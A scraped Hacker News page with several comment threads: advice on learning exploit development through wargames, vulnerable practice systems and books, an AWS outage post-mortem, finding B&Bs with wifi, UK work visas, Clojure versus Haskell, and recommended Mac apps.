Well exploit development is quite a broad topic - while the answers below provides answers that should pretty much help provide a certain perspective, I sure hope that this helps too.

Lets start off with Web-application security - the most common of attack vectors are detailed as part of OWASP top 10 - you can read more about specific attacks with simple google searches, there are loads of articles that do the same. In order to write exploits you can try the wargames which are present online, or download intentionally vulnerabile operating systems/applications and practice on them(DVL, DVWA etc). The techniques involved in finding these vulnerabilities include fuzzing, vulnerability scanning, source code audit and manual blackbox testing.

Another area of exploitation is that of binaries that run on a particular operating system. Such exploitation usually requires you to find the vulnerability using reverse engineering/source code audit and/or fuzzing. Writing exploits requires you to have at least a good understanding of the stack layout, calling conventions, asm and shellcode. Of course, in this case I am referring to "overflow" vulns and not logical errors.

In order to practice exploitation, you can try out wargames as they are an excellent resource. There are wargames for binary exploitation(smashthestack.org, overthewire.org), webapp hacking(hacking-lab, hackthissite.org, DVWA, and LOADS more) and crypto(overthewire.org and smashthesite.org have crypto wargames), linux admin hacking(hacking-lab has a few every now and then).

Exploit development requires one to have strong fundamentals and understand how exactly stuff works under the hood. There are quite a few books that you might find interesting based one your interests. If you are into webapplication hacking Id suggest "the tangled web" and "the web application hackers handbook". If you are into binary hacking id suggest "the shellcoders handbook"(there are so many more awesome ones but this ones the best to start off with IMO).

Please note that here I have answered the question "How to develop exploits" rather than questions such as "How do i develop the security mindset" and "How do I find security vulnerabilities".

Hope this helps.

[EDIT]

For purposes of learning do NOT use scanners(such a sqlmap), automation frameworks(for eg: msf for generating shellcode). While I think these tools are AWESOME, they should only be used once you have learnt how they work and when you reach a level that you feel you are unnecessarily doing work that could be automated.

31
pandemicsyn 1 day ago 2 replies      
I'm not sure about recent versions but the first edition of "Hacking: The Art of Exploitation" was great a few years ago.
32
leif 1 day ago 0 replies      
get a random version of wuftpd from the archives. it likely has multiple exploits waiting for you, probably even a remote root

if you need some hints, search "wuftpd remote root" to see the form they often take

33
tshadwell 1 day ago 0 replies      
Learn the oddities and the specifics in the parsing of a language, keep in memory problems with a very easy, and vulnerable solution and keep your eyes peeled. If you're awake, sometimes you think "This looks vulnerable..." and investigate. If you're lucky, something will go wrong in the site and you press on.
34
jonaslejon 1 day ago 1 reply      
The best way is to start from the beginning, in other words read "Smashing the stack for fun and profit". These technics doesn't work on current operating systems but gives to a great start http://insecure.org/stf/smashstack.html
35
paisible 1 day ago 0 replies      
check out io.smashthestack.org : awesome wargame with 20+ levels, definitely will give you somewhere to start digging your teeth in.
7
Post-Mortem of AWS Outage
20 points by dlgeek  20 hours ago   5 comments top 2
1
dlgeek 20 hours ago 1 reply      
What I found most remarkable was how in-depth their backup systems were and how many things had to go wrong for this to become an event.

This happened because they lost primary power AND had a generator fail AND had a distribution breaker fail. I wonder how often any two of those happen without us ever knowing about it...

2
mw642 18 hours ago 1 reply      
Wow! A proper outage post-mortem that isn't babbling on about control rods. I love it.
8
Ask HN: Which APIs flirttape is using for song search?
4 points by motyar  9 hours ago   2 comments top 2
1
flexterra 1 hour ago 0 replies      
Hi, I'm part of the team that made flirttape and I can confirm that we are using YouTube as our source of media.
2
badabadam 9 hours ago 0 replies      
youtube.
9
Ask HN: How do you make sure a B&B has wifi in the room?
18 points by johnnyg  18 hours ago   18 comments top 9
1
MehdiEG 18 hours ago 2 replies      
Running a couple of online businesses that require us to have online access wherever we are (it's always when you decide to go away for a week that the site goes down or an army of spammers targets your member), this is a problem we constantly run into whenever we go away, be in on holidays or for business.

There's nothing like that yet as far as I know. Most hotels and B&B will indicate whether they've got wifi access. Typically, if wifi isn't mentioned, it means no wifi.

But knowing that wifi is available isn't actually all that helpful. You'll often find that wifi is available but costs more than the room itself. Or, even more often, it just doesn't work or is unusably slow.

So we always try to get a place with wifi but also always carry an unlocked MiFi with us. In the UK, you can get one for ÂŁ50 on PAYG on Three and unlock it for a few quids. PAYG data topups in the UK on Three are reasonably priced (ÂŁ15 for 3GB of data). When we go abroad, we first check this wiki to find local operators with decent PAYG data plans and we buy a local SIM card as soon as we land: http://prepaidwithdata.wikia.com/wiki/Prepaid_SIM_with_data

It's a hassle but if you really need internet access, that's the only option at the moment I'm afraid. There is definitely a niche for a way to identify hotels and B&B with free / reasonably priced and reliable wifi connection (and also cafés while we're at it - it's an incredible pain to find café with working wifi).

2
neilk 18 hours ago 0 replies      
AirBnb allows you to constrain a search to properties that have Internet, Wireless Internet, and Breakfast.

Do a search, then look on the right side of the page for the "Amenities" widget (you have to scroll all the way down). You could also add "beach" and/or "ocean" as a keyword in the widget right under that.

Voila.

http://www.airbnb.com/search?location=California&keyword...

3
fleitz 17 hours ago 0 replies      
I would recommend two tools, one is called email and the other is called the phone. Depending on whether the place has an email address or a phone select the appropriate tool, contact the proprietor and inquire as to whether his establishment will be suitable for your purposes.

Given that your using tools used to sellbed and breakfasts on the internet chances are high that the proprietor has both breakfast AND wifi.

4
citricsquid 18 hours ago 0 replies      
Seems like something you could use a site like exec or taskrabbit for. Have a "personal assistant" call around some diffetent B&Bs (or even have them find B&Bs for you) and get info on their wifi.
5
Lucadg 17 hours ago 0 replies      
I have been working online for many years now and I share your pain :)

I don't think relying on the information the Owners give can be a solution.
They want to sell and they'll consider their shared wifi connection always "fast", whatever that means.

We have developed a niche platform for vacation rentals which would allow you to build a website dedicated just to vacation rentals with internet connection.
(some call it an Airbnb builder, but this is not accurate for many reasons. One of them is that we don't do peer to peer).

Anyone wanting to open a small business to fill this niche could use our CMS to build the site and select the accommodations from the thousands we have.
We have local Managers who visited personally most of these Owners and Accommodations, so they can provide you with hard data such as Actual Internet Speed.
SpeedTest.net results for instance.

This is different from letting the Owners check that "wi-fi" checkbox.

I had the "only fast internet accommodations" idea long time ago, but we're waiting for the right person/team to come in and do it.

The system is http://www.adormo.com and these are some other niches we built already just to give you an idea:
http://www.topfamilyhomes.com
http://www.kitesurfsleep.com
http://www.petfriendlystays.com

If anybody is passionate to solve this problem with us, please send us an email!

6
benologist 18 hours ago 2 replies      
I've been thinking about this for a while since I travel so much, I think there is a market although I don't know how profitable it'd be.

A site full of hotel wifi ratings, speeds and passwords would be so awesome. Kind of like bugmenot or maybe hipmunk with an agony rating for hotels.

7
Freestyler_3 18 hours ago 0 replies      
Give them a call?

Better than searching through sites when a lot of the time they don't have that info on it.

It should be listed though... it should.

8
rhizome 18 hours ago 0 replies      
I live in San Francisco. When I was last shopping for a car, the car's dimensions were one of the primary criteria I used to decide. No auto website supplies this information, much less let you query upon it, so I was reduced to pad-and-paper and Wikipedia. I have thought over the years that there "should be" a site that centralizes all of this arcana, but whether there's a market niche here I haven't found it. Heck, even Newegg et al, retail sites that use search facets (sidebar filters) have poor content and/or underimplemented details.

So, it's probably worth more to complain to BedAndBreakfast.com to be doing this since they likely already pay someone to pursue details like the one's they already do have. They probably just don't think it's very important and nobody is telling them otherwise.

9
Toph 17 hours ago 0 replies      
Doesn't solve your exact problem but we own a couple hotspot devices. We don't always have a need for them but use them at least a couple times a month on the go around town so they are more than worth it. When you add in trips whether for vacation, business, or anything else, boy do they come in handle. Take a look.
10
OSX apps that keep you hooked to your Mac?
3 points by factorialboy  11 hours ago   12 comments top 9
1
bbgm 10 hours ago 0 replies      
Omnifocus (Omni products in general), Keynote, Alfred, Papers2, Scrivener (although there is a Windows version now), All the text editor options (Notational Velocity, Nottingham, etc)
2
runjake 10 hours ago 0 replies      
Notational Velocity. I know about ResophNotes, etc, but they don't cut it.
3
shasty 10 hours ago 0 replies      
OSX itself keeps me hooked to my Mac. I can find anything I need for this platform. The whole is greater than the sum of its parts.
4
shebson 10 hours ago 1 reply      
It's only loosely an app, but having a real unix terminal (without having to run a VM) is the biggest reason I'm hooked.
5
joshstrange 2 hours ago 1 reply      
XCode
6
jayfuerstenberg 6 hours ago 0 replies      
MarsEdit & Coda
7
cpt1138 11 hours ago 0 replies      
Inspector and Omnifocus
8
codyjames 11 hours ago 0 replies      
Alfred
9
dylanhassinger 11 hours ago 0 replies      
Finder
11
Question: Getting a Job and Moving to UK
6 points by thekillerdev  20 hours ago   6 comments top 6
1
jdietrich 18 hours ago 0 replies      
UK companies can hire workers from anywhere within the EU without any sort of bureaucracy - EU citizens have an automatic right to work anywhere in the EU. The EU includes a number of low-wage countries with good numbers of skilled developers.

There is currently some amount of anti-immigration sentiment in many EU countries, mainly because of the recession. Governments can do nothing to restrict intra-EU migration, so tend to make life hard for non-EU migrants to look tough on immigration. The current British government is tightening quotas on non-EU immigration.

A British company is unlikely to even look at your CV if there's another qualified applicant in the pile, because of the cost and complexity of employing a non-EU worker.

There is no shortage of generalist developers in the UK and wages are significantly lower than in the US. Unless you have some specialised skills, your job search is likely to be quite arduous.

2
Peroni 8 hours ago 0 replies      
Shameless plug: http://www.hackerjobs.co.uk

As others have pointed out, it's near impossible to find an employer willing to assist you in the process in gaining the appropriate visas. Time and effort aside, immigration law in the UK is a legal minefield and unless the company has a previous history of hiring non-EU nationals then they probably won't even look at your CV unfortunately.

3
ig1 17 hours ago 0 replies      
It's become a lot harder to get work visas for the UK since they closed the Tier-1/HSMP program a few years ago. Under the new visa system the only people who are likely to be willing to sponsor you are large firms (IBM, Google, investment banks, etc.) who have the capacity to deal with the overheads required.
4
thekillerdev 17 hours ago 0 replies      
Hello oschrenk i often use this website http://uk.authenticjobs.com/ but mostly i search on google by UK companies and send then the CV.

jdietrich it is good to know about those things, actually i have been struggling to find news about this but i think is just a general sentiment and not a guideline..

ig1, and jacknews you both are right for sure, i've got this feeling from the companies, they are really looking for exceptional skills and not hiring anyone who can be replaced by a local talent.

thanks for clarifying even if it's a almost no hope effort.

5
jacknews 17 hours ago 0 replies      
Most countries have a policy of only issuing work visas to foreigners who have an exceptional skill.
That is, the role can't be filled by local talent. I'm not sure web design/development alone meets that definition.
In addition, the paperwork is onerous for any hiring company.
Why do you think you have the right to work in the UK?
6
oschrenk 18 hours ago 0 replies      
I'm planning to try the same. Would you have some pointers where to start my job search? Did you write to specific companies or did you start your search by crawling job offer sites?
12
Ask HN: Clojure vs Haskell for a first functional language?
10 points by samrat  1 day ago   13 comments top 10
1
fmstephe 1 day ago 1 reply      
I would strongly back Haskell for this purpose. The reason for this is principally that Haskell is a single install, (whereas Clojure requires the jvm first and then Clojure). Haskell is a single language, Clojure is java with Clojure running on top.

When I started learning to program the greatest joy was code=some result. The greatest misery was installation, configuration and bizzaro error messages. In this regard I think Haskell comes out far far ahead. When I first learned Haskell I remember installing Hugs was simple and the REPL worked immediately.

I think that the number one consideration for a first time programming language is the ease with which you can get working software that does something and gives feedback. Clojure has too many leaky abstractions and is not nearly as simple to get up and running. (Aside, I like Clojure)

I think that what I am reading as an implicit question of "should a programmer be initially exposed to the greatest type system known to man in Haskell or the one-true programming language in Lisp" is taking the wrong approach. We should ask "how can I expose a programmer to the joy of making things using only a brain and a keyboard". I suspect that many of the best Haskell and Lisp hackers we have got started on Visual Basic because it was so accessible.

I would be tempted to say Javascript may be an even better answer. Easy to get started and a browser and a text editor makes for a great IDE.

I apologise if my characterisation of your question was wrong. It's not my intention to be offensive or stir up trouble. Those are two great languages to choose from, if you can capture the mind and imagination of a first time programmer with either of them they will be off to a great start.

2
adrusi 22 hours ago 0 replies      
I learned scheme first, then haskell, then (now) clojure. I think haskell is best for teaching functional programming because it's purely functional and puts focus on that aspect rather than on performance benefits of being functional. after ~1 year with it, I've decided that haskell, while great, is not for me, and I'm switching over to clojure. Clojure is very nice as a language; what it lacks in terms of a type system it makes up for with the presence of macros.

However, I don't think that clojure is quite as great for teaching functional programming, because it is an eager language unless you explicitly tell it to be lazy exactly where you want it to be, so it doesn't have the performance optimizations that haskell has with recursion (as opposed to tail-call recursion) and it's therefore discouraged to not use tail-call recursion.

Now that's my recommendation for a first functional programming language. For a first language in general, I'd recommend the reverse because with clojure you can actually start doing something practical as soon as you get started, where with haskell it takes a while to get to that point.

But the installation process is different with the two. With clojure, the language is designed around being used with a build system as part of java tradition, which means that you normally can't just type `clj` and get a REPL (at least not with the official distribution). Generally the best way to go about doing that is to install leiningen and make a new project and do `lein repl` in the project directory.

In Haskell on the other hand (with the Haskell platform installer) you can just run the installer and type `ghci` and get a REPL. If you want to run a Haskell program to test it, it's just `runhaskell file.hs` and to compile, it's as simple as `ghc --make file.hs`. But when things get more complicated, even slightly so, Haskell can be an incredible pain to deal with (in terms of compiling and such) whereas clojure, being designed around build systems for large project, scales up just fine.

3
LukeHoersten 23 hours ago 0 replies      
Great question. I would suggest first learning a Lisp (Elisp, Clojure, Scheme, Arc, etc) and then moving to Haskell.

With Haskell, you'll be learning more than basic lambda calculus. Haskell has a lot of new concepts that traditional-language programmers may have to rewire their brains to think about. Things like lazy evaluation by default, automatic currying, a more advanced type system than most other languages and the concepts that brings like Functors, Monads, and Iteratees. Lazy IO is rough edge which is, as we speak, in the process of being cleaned up by Iteratees.

With a Lisp, you can learn the basic concepts of lambda calculus without having to learn more advanced language features at the same time. You'll tackle things like programming in a declarative language and leveraging first-order functions. Remember, you're trading for-loops for recursion, and for some, that's enough brain rewiring without also worrying about lazy IO.

Lisp allows you to divide and conquer the multitude of language features functional languages have to offer. Why take them all on at once? Once you're comfortable with Lisp, Haskell's true benefits really start to shine. Haskell is by far my favorite language and I find myself hating programming without the features it offers but I'm not sure I would have made it far enough to see it's benefits without learning Scheme first. And learning Lisp is easy. It's a terse language which one could write a small project in in a few weeks and be ready for Haskell.

Haskell is challenging but there's a reason which I'll try to illustrate with an analogy: Calculus is more complex than arithmetic and without a more advanced problem to solve, the added complexity may not be a clear advantage. But you get to a certain point in physics where it simply becomes harder to work in only arithmetic and learning the abstraction of calculus up front pays dividends. Haskell is the same way. I'll end with PG's "The Blub Paradox" http://www.paulgraham.com/avg.html scroll down).

4
Mikera 1 day ago 0 replies      
I think it is worth learning both. Clojure is more "practical" in the sense that it is dynamic, impure and gives you access to the huge JVM library ecosystem, which is a huge advantage for real world projects. Haskell is pure and extremely elegant in an almost mathematical sense - if you want to learn the "true essence" of functional programming then it is ideal. Overall, Clojure is my favourite because of the practicality and the fact that it is compelling for other reasons (Lisp-style metaprogramming, interactive REPL development, code-as-data philosophy, concurrency features etc.
5
jfaucett 1 day ago 0 replies      
Haskell is "cleaner" and "purer" if you're coming from a mathematical background its also probably going to be easier. Since this is going to be your first programming language I'd suggest Haskell since its cetianly more elegant (in my opinion). I'm a biased Haskell enthusiasist so that's my suggestion :)
6
gtani 1 day ago 0 replies      
Without taking sides, I would say look at some books on each. Kinda like comparing plutonium and uranium, or a cello to a guitar. Maybe these comparisons are silly. While youre at it look at scala and O'Caml.

You can look at the Yesod book, Real World Haskell and "Learn You a" online, i.e. read the complete, updated texts. Thompson's orange "Craft of FP" is a good read also, with methodical (and relatively slow-paced) coverage of all the basics. GHC is piling on language features and libs at a breathless pace, from deferred type checks, limited forms of dependent types, concurrency (async loops, STM, updated thread manager), IO abstractions (conduits), web apps (Yesod)

http://hackage.haskell.org/trac/ghc/wiki/Status/May12

Clojure is an incredibly well documented (in books) language. I'm looking at the excellent O'reilly and Pragmatic books, and the 2 Manning books ("Joy of" is terrific), all of which came out in the last 4 months and target 1.3. And i will wager that Marick's book will be top notch as well. Unfortunately, these don't have texts online.

7
lhnz 22 hours ago 0 replies      
Haskell.

If you're going to learn a functional programming language learn a pure one.

8
samrat 23 hours ago 0 replies      
EDIT- I just noticed that I accidentally typed out "first programming language", what I really meant to type was "first functional programming language". Sorry, for the confusion.
9
fiatmoney 1 day ago 0 replies      
Neither is a bad choice. I'm partial to Clojure, specifically because it does integrate well with every Java library known to man. Starting out, there's a real Pavlovian benefit in being able to do something cool that "just works", and figure out the underlying principles later. It's fairly easy to take Clojure and integrate it with your machine learning library of choice, or a web framework, or Hadoop. Haskell has some of those libraries as well, but the advantage is that from the beginning you're exposing yourself to polyglot programming and it's easier to mix in some raw Java, or JRuby, or Jython...
10
ExpiredLink 23 hours ago 2 replies      
> Which is more suited for someone who's just trying to learn their first programming language?

None. Learn a language that is appropriate for beginners like Python or PHP.

13
Ask HN: Just ordered my first Mac- what apps should I know about?
31 points by olegious  17 hours ago   57 comments top 39
1
radq 17 hours ago 0 replies      
Have you seen these threads?

http://news.ycombinator.com/item?id=2147642

http://news.ycombinator.com/item?id=2161855

I found them pretty useful -- have a look!

Also have a look at this one: http://news.ycombinator.com/item?id=3407705

2
RodgerTheGreat 17 hours ago 2 replies      
Colloquy[1] is a fantastic IRC client.
TextWrangler[2] is one of my favorite text editors.
If you're familiar with Linux, you'll want a package manager- popular options are MacPorts[3] or Fink[4].
As far as media players, VLC[5] has a very nice OSX port.

[1] http://colloquy.info/
[2] http://www.barebones.com/products/TextWrangler/
[3] http://www.macports.org/
[4] http://www.finkproject.org/
[5] http://www.videolan.org/

3
mtrn 17 hours ago 1 reply      
Quicksilver http://qsapp.com/ - I never opened an application from Finder or Dock again.

From their site:

Quicksilver is a launcher utility app for Mac OS X which gives you the ability to perform common, every-day tasks rapidly and without thought. An introduction to Quicksilver's abilities include:

* Accessing applications, documents, contacts, music and much, much more.

* Browsing your Mac's filesystem elegantly using keywords and 'fuzzy' matching.

* Managing content through drag and drop, or grabbing selected content directly.

* Interacting with installed applications through plugins.

4
jherdman 17 hours ago 2 replies      
If you don't like Quicksilver, Alfred is really good too (http://www.alfredapp.com/).

Sublime Text 2 is pretty great (http://www.sublimetext.com/2).

5
CJefferson 17 hours ago 0 replies      
Try standard terminal, I prefer it to item 2.

Home brew or mac ports help install unixy tools. Work on the assumption that whichever you install, at least once a year you will have to completely remove it and reinstall it, as sometimes they get in a mess.

Apple mail is OK, I prefer thunderbird, but it isn't very Macy.

VLC tends to play whatever you chuck at it.

General note - HFS tends to get unhappy (performance-wise) if your drive gets more than about 85% full.

When I first got a mac I was tempted to install lots of hacks to standard apps and the OS. These seem much less popular nowadays, but still try to resist any, at least for a while. Mac OS X is very hard to debug if it starts to misbehave.

finally, never install the .0 version of any new OS :)

6
mtrn 17 hours ago 0 replies      
As a developer I very happy, that http://mxcl.github.com/homebrew/ exists. It's a package manager (#packages as of today: 2024), like apt or yum - with a very nice command line interface and a great community.

> Homebrew is the easiest and most flexible way to install the UNIX tools Apple didn't include with OS X.

7
MehdiEG 16 hours ago 2 replies      
Interesting - I haven't actually reviewed my Mac's config in a while - I might pick up a few goodies in those lists myself. For what it's worth, this is what I would automatically install on any new Mac:

- iStat Menus: RAM, network and CPU usage right in your menu bar. Ridiculously useful.

- Video player: VLC

- FTP: CyberDuck. Desperately slow to launch and not a big fan of the UI but it's free, it works and I use FTP rarely enough to never have bothered looking for something better.

- gfxCardStatus - not necessarily a must-have but quite handy to see which app is causing your Mac to switch to the battery-sucking discrete GPU.

- Email: MailPlane (gmail / google apps only). I have to say that I've never found what I would consider to be a great email client for my taste on either Mac or Windows. So these days, I stick with Gmail's web interface (which I'm not a big fan of either but there's no native app that I find any better).

- Text Editor: TextWrangler. I still prefer Notepad++ though (in part because TextWrangler, like so many apps on Mac OS X, is so slow to launch).

- DaisyDisk - for later when you'll inevitably run out of disk space.

- Parallels Desktop for Windows + Remote Desktop Connection to manage Windows servers. I wish there was a better RDP client and a decent SSMS-like SQL Server client.

- Apps that used to be must-have but that I no longer use: HandBrake (DVD ripping), LiquidCD (CD / DVD burning), NetNewsWire (RSS)

That's about it. Random stuff that you might or might not need: Acorn (simple, cheap image editor), CoconutBattery, Hues (standalone color picker), iStumbler (Max OS X's NetStumbler), MacHg (Mercurial client). You can try Sparrow for email too.

That's it - have surprisingly few apps actually.

8
pooriaazimi 8 hours ago 0 replies      
(Haven't read other suggestions. Certainly all of these have been suggested before, in that case bump the vote count on those apps!)

- First thing you should do: Install Homebrew: https://github.com/mxcl/homebrew/

- IRC: Colloquy - http://colloquy.info

- Editor: Sublime Text 2 - http://www.sublimetext.com/2

- Launcher: QuickSilver or Alfred

- Lion's Mail.app is great. I used to use Sparrow (http://sparrowmailapp.com) on Snow Leopard, but don't need it anymore. It's a little buggy and I like Mail.app's UI better.

- IMPORTANT: Check http://gpgtools.org for a simple app that lets you manage PGP credentials and use them in Mail.app and elsewhere (don't miss this one)

- RSS reader: Reeder - http://itunes.apple.com/us/app/reeder/id439845554?mt=12

- You're new to Mac, so install CheatSheet (http://itunes.apple.com/us/app/id529456740?mt=12) to learn keyboard shortcuts by heart (press down CMD key for 2 seconds to get a list of all shortcuts)

- Check this blog out - it has plenty of great stuff about OS X that even veteran OS X users don't know (trust me, I know a lot of them): http://www.macyourself.com

- You'll inevitably wonder what 'ocspd' or 'mdworker' are, when using 'ps -Ac' or 'top' (spoiler: ocspd is for certifications, and mdworker, or metadata-worker is a process that gathers information about files and feeds them to Spotlight for search), so install atMonitor (http://www.atpurpose.com/atMonitor/) instead of searching for process names on the Internet. It offers tons of other cool features.

- Markdown Pro (http://www.markdownpro.com) and Mou (http://mouapp.com) for Markdown.

- As much as I despise iTunes, nothing comes close to it (unfortunately) in terms of media management.

- Bartender - tidies messy menu bars: http://www.macbartender.com

9
AdamGibbins 15 hours ago 1 reply      
* Witch (http://manytricks.com/witch/) - Gives you Alt-Tab (Window switching) alongside the default Cmd-Tab (Application Switching).

* Moom (http://manytricks.com/moom/) - allows you to move windows around a lot easier.

* TotalFinder (http://totalfinder.binaryage.com/) - Finder with tabs and other useful bits.

* CoRD (http://cord.sourceforge.net/) - Decent RDP client (better than the official Microsoft one).

* Caffeine (http://itunes.apple.com/gb/app/caffeine/id411246225) - Stops the screensaver activating at the click of a button.

* CleanMyMac (http://macpaw.com/cleanmymac) - Can strip the unwanted language packs etc from applications saving you a significant amount of space.

* Enqueue (http://www.enqueueapp.com/) - Decent iTunes replacement, with FLAC support.

* Flu.x (http://stereopsis.com/flux/) - Warmer screen during dark hours, makes it easier to work in dim light.

* SourceTree (http://www.sourcetreeapp.com/) - Decent GUI Git/Hg/SVN client.

* GrabBox (http://grabbox.devsoft.no/) - Instantly throws screenshots into your Dropbox public folder.

* iStat Menus (http://bjango.com/mac/istatmenus/) - Memory and CPU utilisation in your menu bar.

* YoruFukurou (http://itunes.apple.com/gb/app/yorufukurou/id428834068) - Decent Twitter client with muting rules etc.

10
ricardobeat 17 hours ago 0 replies      
This is my current setup. The real essentials are Dropbox, ST2 and Homebrew, but these are all amazing pieces of software:

- Sublime Text 2 editor (even has a vim mode) (http://www.sublimetext.com/2)

- Sparrow, but you might be happy with the native Mail app (http://sparrowmailapp.com/)

- Media: iTunes and Quicktime do a good job, VLC occasionally.

- Handbrake for encoding (http://handbrake.fr)

- Transmission (http://www.transmissionbt.com/)

- Dropbox (http://getdropbox.com)

- Cloud app: instant, easy uploads (http://getcloudapp.com)

- Twitter's official client (http://itunes.apple.com/us/app/twitter/id409789998)

- CSS: uh? There is Coda/TopStyle/Espresso, but ST2 is enough

- Github for Mac (http://mac.github.com)

- Versions for SVN (http://versionsapp.com)

- Sequel Pro (http://www.sequelpro.com/)

- Homebrew package manager (http://mxcl.github.com/homebrew/)

- ImageOptim (http://imageoptim.com/)

- CodeKit or LESS.app for LESS/Coffee compiling (http://incident57.com/codekit/)

- MS Office: yeah (it's much better than the windows version). Just hide the cruft away (MSN etc) after installing.

- Wunderlist to-do app (http://wunderlist.com)

Nice to have / superfluous:

- Mou markdown editor (http://mouapp.com/)

- Cathode: vintage terminal emulator (http://www.secretgeometry.com/apps/cathode/)

- Lidpop: make noises when you close/open your lid (https://shinyplasticbag.com/lidpop/)

11
johncoltrane 8 hours ago 0 replies      
* Adium is great.

* Growl works very well but the whole notification business (emails + builds + IM + song details…) can be counter productive. Use it lightly.

* iTerm2 is the most modern terminal emulator you'll find on Mac OS X. I use it only because I wanted 256 colors and I'm not on Lion. I've never used its more advanced features.

* I don't know Notepad++ but I would say Sublime Text 2 (http://www.sublimetext.com/blog/articles/sublime-text-2-beta) and TextMate (http://macromates.com/) may do. You could also try a full blown IDE like Aptana (http://aptana.com/) or RubyMine (http://www.jetbrains.com/ruby/). If you already know Vim, MacVim (https://github.com/b4winckler/macvim) is the way to go for both the GUI and the CLI.

* Apple's own Mail.app works well. I've never felt the need to use another app. Microsoft's Outlook is pretty good, too.

* VLC is the obvious choice on Mac OS X too. You might want to install Perian (http://perian.org/) to add support for many exotic formats to Quicktime. For audio, Cog (http://cogx.org/) is nice.

* You don't need a CSS editor. Just use your code editor.

---

You might be interested in a few other apps:

* ClipMenu (multiple clipboards) http://www.clipmenu.com/

* Burn (disc burning) http://burn-osx.sourceforge.net/Pages/English/home.html

* Charles (http debugging) http://www.charlesproxy.com/

* DejaMenu (access the menubar from a contextual menu) http://homepage.mac.com/khsu/DejaMenu/DejaMenu.html

* HTTP Client (http debugging) http://ditchnet.org/httpclient/

* Notational Velocity (the most elegant AND efficient note taking app ever) http://notational.net/

* Quicksilver (Quicksilver) http://qsapp.com/

* ShiftIt (window positioning) https://github.com/fikovnik/ShiftIt

* The unarchiver (opens exotic archive formats) http://wakaba.c3.cx/s/apps/unarchiver.html

* Yummy FTP (the best FTP client on Mac OS X) http://www.yummysoftware.com/

* VirtualBox (virtual machines) https://www.virtualbox.org/

* SourceTree (Git/Mercurial GUI) http://www.sourcetreeapp.com/

12
nerdfiles 16 hours ago 2 replies      
I prefer Alfred (http://www.alfredapp.com/) over Quicksilver.

Recommending:

1. https://github.com/Lokaltog/vim-powerline

2. https://github.com/revans/bash-it

3. https://github.com/tpope/vim-fugitive, https://github.com/tpope/surround

4. The https://github.com/scrooloose/nerdtree

5. http://bywordapp.com/

6. http://bbt2.drikin.com/

7. http://willmore.eu/software/isolator/

8. https://gist.github.com/2260182 (OS X for Hackers)

9. Cathode (http://www.secretgeometry.com/apps/cathode/, for shits and giggles)

10. DiffMerge (http://www.sourcegear.com/diffmerge/)

11. Electric Sheep (http://www.electricsheep.org/)

12. Gridwars (http://gridwars.marune.de/)

13. Integrity (http://peacockmedia.co.uk/integrity/)

14. httrack (http://www.httrack.com/)

15. iSoul (http://code.google.com/p/isoul/)

16. LittleIpsum (http://littleipsum.com/)

17. KeyCastr (https://github.com/sdeken/keycastr, more shits)

18. LiveReload (http://livereload.com/)

19. Mactracker (http://mactracker.ca/)

20. Onyx and/or Maintenance (http://www.titanium.free.fr/)

21. MAMP (http://www.mamp.info/)

22. MacVim (http://code.google.com/p/macvim/)

23. Patterns (http://itunes.apple.com/us/app/patterns-the-regex-app/id4294...)

24. Mou (http://mouapp.com/)

25. mutt (http://www.mutt.org/)

26. Pixelmator (http://www.pixelmator.com/)

27. ProCSSor (http://procssor.com/)

28. Reeder (http://reederapp.com/)

29. Skim (http://skim-app.sourceforge.net/)

30. Slammer (http://ringce.com/slammer)

31. Q (http://www.kju-app.org/)

32. svnX (http://www.lachoseinteractive.net/en/community/subversion/sv...)

33. SSHTunnel (https://github.com/primalmotion/sshtunnel)

34. localtunnel (http://progrium.com/localtunnel/)

35. The Unarchiver (http://wakaba.c3.cx/s/apps/unarchiver.html)

36. Homebrew (http://mxcl.github.com/homebrew/)

37. VLC Player (http://www.videolan.org)

38. Compass/SASS/LESS (http://compass-style.org/install/, http://sass-lang.com/, http://lesscss.org/)

39. Pandoc (http://johnmacfarlane.net/pandoc/)

40. http://code.google.com/p/zen-coding/

13
moocow01 17 hours ago 0 replies      
* iWork - Cheaper than Office and better in my opinion

* Transmit - FTP

* Pixelmator - 90% of Photoshop without the high cost but still with a slick interface

* Cornerstone/Versions - SVN

* Textmate - Code editor

* Wunderlist - Todo list

* Fantastical - Easy way to access and add dates to your mac calendar

* Concentrate - Block HN and other stuff when you need to get things done

(Note: Most of these are not free and are between $10-$80 but well worth it in my opinion)

14
msutherl 16 hours ago 1 reply      
Things I haven't seen here yet:

1. Backblaze for off-site backups: http://backblaze.com
2. Dash for access docs: http://itunes.apple.com/us/app/dash-docs-snippets/id45803487...
3. Solarized and ir_black themes for Terminal and all editors: http://ethanschoonover.com/solarized / http://blog.toddwerth.com/entries/13 (I use ir_black w/ Terminal.app, terminal Vim and the sidebar fork of Macvim: https://github.com/alloy/macvim/wiki/Screenshots)
4. This fork of GitX: http://gitx.laullon.com/
5. DTerm (pop-up terminal emulator for the occasional 'less README'): http://decimus.net/DTerm
6. XScope (rulers and stuff for UI design): http://xscopeapp.com/
7. LittleSnapper (tried everything, this is the fastest and cleanest way to collect UI inspiration â€" Skitch + Evernote would be my second choice): http://www.realmacsoftware.com/littlesnapper/
8. Found (don't use this much, but it's awesome. Indexes Gmal, Dropbox and Google Drive and lets you search and launch files â€" a bit like Alfred): https://www.foundapp.com/
9. DaisyDisk (essential harddrive file visualization): http://www.daisydiskapp.com/

And, another shoutout for Quicksilver â€" more powerful than Alfred.

15
gks 17 hours ago 0 replies      
Apps that I install immediately upon re-installation or a new Mac:

* 1Password - Password facilitator (http://www.agilebits.com, buy the Mac App Store version)

* OmniFocus - GTD/Todo list (http://www.omnigroup.com/omnifocus)

* OmniOutliner - Best list makinga pp ever (http://www.omnigroup.com/omnioutliner)

* OmniGraffle - Great for development purposes (http://www.omnigroup.com/omnigraffle)

* Acorn - Quick image editing (http://www.flyingmeat.com/acorn)

* VoodooPad - Personal Wiki (http://www.flyingmeat.com/voodoopad)

* Byword - Markdown editor (http://bywordapp.com/)

* Dropbox - Duh (http://www.dropbox.com)

* Fantastical - Calendar app (http://flexibits.com/)

* Launchbar - Launcher (http://www.obdev.at/products/launchbar/)

* Reeder - Google Reader client (http://reederapp.com/)

* Transmit - SFTP (http://panic.com/transmit/)

* VLC - Video (http://www.videolan.org)

Along with iA Writer, Writeroom, Sublime Text, etc etc... there are a lot of great apps. The above is my favorites.

16
gte910h 11 hours ago 0 replies      
DragonDrop (shake the mouse drop stuff in an always on top window, then drag it back out when you find where you want to drop it and it disappears)

Divy (Lay out all your windows on a grid extremely quickly)

Skitch (quickly marking up screenshots, photos, etc)

